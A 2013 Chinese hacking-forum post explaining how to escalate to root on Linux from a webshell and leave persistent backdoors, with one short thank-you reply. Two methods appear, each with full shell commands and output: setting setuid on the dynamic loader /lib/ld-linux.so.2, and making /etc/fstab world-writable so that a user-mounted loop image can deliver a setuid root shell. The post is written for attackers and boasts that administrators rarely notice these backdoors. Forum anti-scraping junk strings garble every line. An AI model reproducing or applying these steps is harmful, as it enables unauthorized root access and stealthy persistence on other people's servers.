找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3168|回复: 1
打印 上一主题 下一主题

webshell下LINUX提权+留后门

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:56:25 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究
# o% o+ G* B9 v, C" _
9 E. I2 M7 D) T, I2 D" R[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究0 X0 `# P- G" [: h) t  S# j
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
; x$ P! @# [2 v7 ?1 V, o1 Qlrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究" j/ A- h1 Z, k0 D( J
[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究* Z5 ^# N# n* E" z) s, K
[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
  y3 K& Q5 b8 m7 I& W. Q# x9 K-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究$ d* }* M. ^9 N, u  w' B
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
. Y+ g" ?! g3 q) V8 D2 v[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究
. u- [; @  Z2 a我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究
: R4 H; n, x# G2 B. a3 p3 n$ u* P# R: v* e# w4 E
普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究1 k4 Z" C1 F; \9 O6 ?2 d  m+ V% }

' g4 Z4 ^( n5 G[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究
$ M: Z3 _; U  [( gxiaoyu2ezX-BUG-关注前沿信息安全技术研究# x" o; o) i' i
[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究
- w. C1 m; h6 W2 j# rroot2ezX-BUG-关注前沿信息安全技术研究
& ~3 f0 [" m, i, B, }1 a5 `- }# D, m[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究
1 f1 S$ M+ C5 D4 M% T% g- V恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究
% m( b" v: o% K3 B8 o6 M1 e6 f5 s% w* p6 T! Z, I% N
方法二:2ezX-BUG-关注前沿信息安全技术研究& X* C4 N6 v) x# q/ E+ Z- F
& c) S; [- ~$ h9 l
看过程:2ezX-BUG-关注前沿信息安全技术研究' T$ x) H+ z' Q. q; ]* g

; s7 A! k2 P0 V/ U+ ~6 k3 P[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究" T8 u1 e1 t* Q+ O( q  Z
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究7 t. L5 J- A, ~# _2 e
/ J  v' i& m4 g% a  j- n7 B
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
7 i7 \1 l3 b' ~& p
9 [) P$ ]. d- ^- Y$ `[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究4 m5 d! V+ {; U8 j% x) W" q
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
3 h% m) |0 w- F' B- r[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究# ^* B+ R2 d: w. t

$ H! z  Y: D; ?  r* ~然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究
( `' d: K+ p3 _1 L
) v# g- i  D4 ^4 M0 j5 |[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究
' A; B. g3 g6 A, C4 a5 I; g% B$ A2 _-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究# q' G: A3 R2 C0 R
[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究! h/ R5 q8 `, m* u& Z
[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究% U, m  w6 C  J, b* z+ T
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究
( x# d, Z/ [- Ltotal 182ezX-BUG-关注前沿信息安全技术研究
3 f$ S) z6 Y7 k0 ~, `8 v  M' M' Udrwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究
0 H1 w) i& P3 C+ A-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究
) r5 H( |9 i4 j3 \7 X; ~( X[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究# j4 R. i) I: L+ w( P- ]' k1 I( A
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究
% B* _5 ^! K0 H! `看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究
' |% W. S6 v5 u- {; ltest这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究
# T9 ]7 R8 w( E( v) [  i8 ?+ s6 d, n# Z3 ?; l
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究
) x: H" l& W% _8 B& ?: \2ezX-BUG-关注前沿信息安全技术研究+ \2 d" e4 e5 L4 Z
% G; P/ m6 x4 \2 J4 ^0 p6 R- M
回复

使用道具 举报

沙发
发表于 2013-3-13 15:10:29 | 只看该作者
谢谢分享
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表